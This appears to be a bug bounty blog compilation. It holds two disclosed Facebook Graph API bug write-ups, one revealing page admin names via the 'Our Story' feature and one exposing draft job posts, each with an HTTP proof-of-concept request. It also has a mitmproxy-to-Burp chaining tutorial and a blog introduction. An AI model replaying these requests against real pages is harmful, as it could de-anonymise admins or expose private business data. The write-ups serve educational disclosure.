Facebook: Disclose page admins via “Story” feature

Facebook Page Admin mean to be secrete part to the "Facebook Page". Facebook Page has feature "Story" Called as "Our History". Actually this is a Normal Facebook Note which "Our History" is note title and description is "Body" part.

If Page Admin or Page editor will create this note, it will also disclose his name instead of page name because User has created it. That's the Bug occurred in this scenario. It should have return only "Page Name" Properly.

Here is, How the flow was discover over "GraphQL" query.

Author: Philippe Harewood.

Proof of Concept:
1) Request:

GET /v2.12/graphql?q=nodes(page-id){page_story{from,published_document{document_owner}}} HTTP/1.1
Host: graph.facebook.com

2) Response:

{
  "page-id": {
    "page_story": {
      "from": {
        "name": "Page Name"
      },
      "published_document": {
        "document_owner": {
          "name": "Admin or Editor User Name"
        }
      }
    }
  }
}

 
Impact:
This could have let a malicious user derive the name of a page admin or editor that last authored or edited the ‘Our story’ on any chosen page. Note: the attack only works for pages that have ‘Our story’ feature authored/edited.

Source: philippeharewood.com

How to chain or forward mitmproxy to burp suite or any other proxy tool

mitmproxy is a one of the free and open source interactive HTTPS proxy tool. mitmproxy is getting much popular in now day's as it has some unique great features. but it's not yet fully featured tool that similar like burp suite or any other proxy tool. Problem is that when you want use mitmproxy on some point that it works great but can't use tool's or feature like burp suite or their awesome plugin's etc ?

Here is it possible to "CHAIN" or forward mitmproxy to any other your favorite proxy tool's to make more useful combining both proxy tool's

We have to use "mitmproxy" tool as primary proxy server, then forward all mitmproxy traffic to burp suite as secondary proxy tool.

For example.

Client => mitmproxy => Burp Suite => Server.

Step 1:
Install and run "mitmproxy ui" in Windows 10.



Step 2:
You will see, mitmproxy is running!

Web   server listening at http://127.0.0.1:8081/
Proxy server listening at http://*:8080

 
Web Browser will prompt with "Web Server" tool.
(Make sure you have correctly setup your client to proxy at "127.0.0.1:8080" and mimtproxy certificate is installed.)

Step 3:
Now Navigate to menu in "Web Server" Window,
mitmproxy -> Options.

Step 4:
mitmproxy comes with various mode of operations.
Such one of mode is "upstream" proxy mode which we have to choose.
That will let us to forward mitmproxy traffic to another proxy.
 
So, default is "regular" mode.
change it to this,

upstream:http://127.0.0.1:8888

You can choose any port as you want to setup or forward on another proxy tool.
(*note that, do not enter "https://" only put "http://HOST:PORT" otherwise it will not work.)

Step 5:
Now, We have to set another option value to setup. (upstream_cert)
upstream_cert => Tick to Enable It.
 
Step 6:
Final Step, Run "Burp Suite" and setup proxy address used in upstream mode HOST:PORT.
Burp Suite => Proxy => Options => Edit/Add.
Binding => All Interfaces (127.0.0.1) => PORT => 8888
Done.
 
Good! Now we have setup it correctly. Now we can intercept traffic in burp suite which is forwarded from mitmproxy server.

I've uploaded video for more details or clarification which you will understand.

Facebook: Disclose Job posts by page which are in draft's.

Recently, Facebook has launched publicly it's new upcoming "Job Posting" feature in Facebook Page. This feature is limited to the "US and Canada Region" business page's. More detail's can be find here.
Draft Job Post is like an upcoming job opening post saved in draft for future. Disclosing such draft post may result bad impact as it should be secrete information to the company.


One of Facebook Security Researcher "Asadul Islam" found this bug in "Facebook Graph API".

Author: Asadul Islam.

Proof of concept:
1) Make POST Request on graphql.

POST /v2.12/graphql HTTP/1.1
Host: graph.facebook.com

fb_api_caller=RelayModern&variables={"PageID":"123456789"}&doc_id=1846201855397726

Impact:
This could have let users access job posts which are not mean to be accessible.

Introduction to the Bug Bounty Group and Blog

Hello folks,

Let me introduce about this "Bug Bounty Group" and It's blog behalf here.
This is a general public discussion and educational purpose blog info and as well as this would be "Community" on social networking. Such as Facebook Group etc.
For information, posting new's will be available as on "Facebook Page" and "Twitter" Handler.

I'll describe and categorize in this manner. Blog Categories and Labels.

"Bug Bounty Group" is a place where researcher can gain a knowledge about the security and understanding the vulnerability scope and bugs.

This Blog is created only for an educational purpose. This Blog doesn't contain any pirated material or resources. Publishing bad/harmful comment/discussion will not be allowed or links to the external bad zone.

See, Rules page for strict rules.